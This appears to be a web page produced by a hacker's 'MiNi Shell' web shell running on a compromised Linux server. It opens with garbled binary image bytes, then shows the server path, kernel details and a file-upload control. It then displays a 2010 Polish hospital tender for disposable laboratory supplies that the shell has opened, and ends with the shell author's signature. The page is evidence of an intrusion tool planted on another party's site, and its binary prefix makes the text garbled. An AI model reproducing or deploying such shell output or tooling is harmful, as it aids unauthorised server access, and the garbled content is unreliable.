JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100113/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100113/10136-N-2010.html

<p class="kh_header"><b>Włocławek: DIZ - 2 - 2010 Dostawa materiałów laboratoryjnych jednorazowego użytku przez okres 48 miesięcy.</b><br>
<b>Numer ogłoszenia: 10136 - 2010; data zamieszczenia: 13.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Wojewódzki , ul. Wieniecka 49, 87-800 Włocławek, woj. kujawsko-pomorskie, tel. 054 412-94-32, faks 054 4129432.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.republika.szpitalwloclawek.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.szpital.wloclawek.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DIZ - 2 - 2010 Dostawa materiałów laboratoryjnych jednorazowego użytku przez okres 48 miesięcy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1
Lp	Nazwa wyrobu  parametry	Ilość sztuk rocznie	Ilość sztuk w ciągu 48 miesięcy
1	Probówki z PS o pojemności ok.4 ml, średnicy ok.12 mm, długości ok. 75 mm	40000	160000
2	Korki do probówek wymienionych w punkcie 1.	5000	20000
3	Probówki z PS o pojemności ok. 9 ml, średnicy ok.16 mm, długości ok. 105 mm, stożkowe.	25000	100000
4	Probówki z PS o pojemności ok. 9 ml, średnicy ok.16 mm, długości ok. 105 mm, okrągłodenne.	10000	40000
5	Korki do probówek wymienionych w punkcie 3.	3000	12000
6	Kapilary do gazometrii z heparyną sodową - ok. 80 IU  ml, pojemność ok. 130 ul kompatybilne z analizatorami rkz Corning 248 i Rapidlab serii 300	5000	20000
7	Zatyczki do kapilar wymienionych w punkcie 9.	10000	80000
8	Mieszalniki do kapilar o poj. > 100 ?l	31000	124000
9	Końcówki do pipet o pojemności ok. 200 mikrolitrów - żół-te.	12000	48000
10	Końcówki do pipet o pojemności do 1000 mikrolitrów - niebieskie.	4000	16000
11	Końcówki do pipet o pojemności do 5000 ul - bezbarwne.	2000	8000
12	Bagietki laboratoryjne proste z PP o minimalnej długości 125 mm i średnicy 4 mm.	4000	16000
13	Mikroskopowe szkiełka podstawowe z ciętymi krawę-dziami	12000	48000
14	Mikroskopowe szkiełka nakrywkowe 24 x 24 mm	3000	12000
15	Naczynka do moczu z PS, pojemność ok.120 ml z za-krętkami.	25000	100000
16	Etykiety samoprzylepne do naczynek do moczu - bez nadruku.	25000	100000

Zadanie 2
lp	nazwa wyrobu  parametry	ilość sztuk rocznie	ilość sztuk w ciągu 48 miesięcy
1	Pojemnik na odpady laboratoryjne z tworzywa sztuczne-go o pojemności około 10 litrów.	400	1600
2	Pojemnik na odpady laboratoryjne z tworzywa sztuczne-go o pojemności około 5 litrów.	500	2000
3	Pojemnik na odpady laboratoryjne z tworzywa sztuczne-go o pojemności około 3,5 litrów.	150	600.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.79.30.00-5, 38.43.70.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 48.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> a.	posiadają uprawnienie do wykonywania określonej działalności lub czynności, jeżeli ustawy na-kła?dają obowiązek posiadania takich uprawnień - prowadzenie działalności gospodarczej w
zakresie produkcji i lub sprzedaży materiałów laboratoryjnych jednorazowego użytku.  Wykonawca, który nie będzie posiadał w zakresie prowadzonej działalności sprzedaży materia-łów laboratoryjnych jednorazowego użytku zostanie wykluczony.
b.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia - za spełnienie warunku posiadania niezbędnego doświad?czenia Zamawiający uzna wykonanie z należytą starannością w okresie ostatnich 3 lat ( a jeżeli 
okres prowadzenia działalności jest krótszy - w tym okresie ), przed dniem wszczęcia postępo?-
wania co najmniej 1 dostawy odpowiadającej  wartości nie mniejszej niż 20.000,00 zł za  ofe-
rowany przedmiot.         
zamówienia . Wykonawca, który nie wykaże się zrealizowaną dostawą zostanie wykluczony z 
postępowania.			
c.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - za speł?nienie tego wymogu Zamawiający uzna wykazanie przez Wykonawcę posiadaniem środków finansowych  lub zdolności kredytowej w wysokości co najmniej złożonej oferty.
Nie posiadanie wystarczającej ilości środków finansowych spowoduje wykluczenie Wykonawcy.
d.	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy pzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> a. aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewi-
     dencji działalności gospodarczej - dokumenty wystawione nie wcześniej niż 6 miesięcy 
     przed upływem terminu składania ofert,
b. wykazu wykonanych w ciągu ostatnich trzech lat podobnych dostaw, a jeśli okres prowa-dzenia działalności jest krótszy - w tym okresie -  z podaniem  ich wartości, dat wykonania oraz odbiorców, wraz z dokumentami potwierdzającymi, że wykazane dostawy zrealizowane zostały z należytą starannością,
c wypełnione oświadczenie z art. 22 ustawy pzp wg Załącznika Nr 2,
d.  informacji banku, w której potwierdza się odpowiednią wielkość posiadanych środków 
      finansowych lub zdolności kredytowej wykonawcy,
-	wymagany dokument - zaświadczenie z banku,.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital.wloclawek.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Wojewódzki
     Dział Inwestycji i Zaopatrzenia
ul. Wieniecka 49 , pokój 303 (biurowiec)
              87-800 Włocławek.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.01.2010 godzina 10:00, miejsce: Szpital Wojewódzki
     Dział Inwestycji i Zaopatrzenia
ul. Wieniecka 49 , pokój 303 (biurowiec)
              87-800 Włocławek.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> DIZ- 2-2010 Dostawa materiałów laboratoryjnych jednorazowego uzytku przez okres 48 miesiecy 
( Zadanie 1).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Nazwa wyrobu  parametry	Ilość sztuk rocznie	Ilość sztuk w ciągu 48 miesięcy
1	Probówki z PS o pojemności ok.4 ml, średnicy ok.12 mm, długości ok. 75 mm	40000	160000
2	Korki do probówek wymienionych w punkcie 1.	5000	20000
3	Probówki z PS o pojemności ok. 9 ml, średnicy ok.16 mm, długości ok. 105 mm, stożkowe.	25000	100000
4	Probówki z PS o pojemności ok. 9 ml, średnicy ok.16 mm, długości ok. 105 mm, okrągłodenne.	10000	40000
5	Korki do probówek wymienionych w punkcie 3.	3000	12000
6	Kapilary do gazometrii z heparyną sodową - ok. 80 IU  ml, pojemność ok. 130 ul kompatybilne z analizatorami rkz Corning 248 i Rapidlab serii 300	5000	20000
7	Zatyczki do kapilar wymienionych w punkcie 9.	10000	80000
8	Mieszalniki do kapilar o poj. > 100 ?l	31000	124000
9	Końcówki do pipet o pojemności ok. 200 mikrolitrów - żół-te.	12000	48000
10	Końcówki do pipet o pojemności do 1000 mikrolitrów - niebieskie.	4000	16000
11	Końcówki do pipet o pojemności do 5000 ul - bezbarwne.	2000	8000
12	Bagietki laboratoryjne proste z PP o minimalnej długości 125 mm i średnicy 4 mm.	4000	16000
13	Mikroskopowe szkiełka podstawowe z ciętymi krawę-dziami	12000	48000
14	Mikroskopowe szkiełka nakrywkowe 24 x 24 mm	3000	12000
15	Naczynka do moczu z PS, pojemność ok.120 ml z za-krętkami.	25000	100000
16	Etykiety samoprzylepne do naczynek do moczu - bez nadruku.	25000	100000.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.79.30.00-5, 38.43.70.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 48.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> DIZ -2-2010 Dostawa materiałów laboratoryjnych jednorazowego użytku przez okres 48 miesięcy (Zadanie 2).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> lp	nazwa wyrobu  parametry	ilość sztuk rocznie	ilość sztuk w ciągu 48 miesięcy
1	Pojemnik na odpady laboratoryjne z tworzywa sztuczne-go o pojemności około 10 litrów.	400	1600
2	Pojemnik na odpady laboratoryjne z tworzywa sztuczne-go o pojemności około 5 litrów.	500	2000
3	Pojemnik na odpady laboratoryjne z tworzywa sztuczne-go o pojemności około 3,5 litrów.	150	600.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.79.30.00-5, 33.43.70.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 48.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com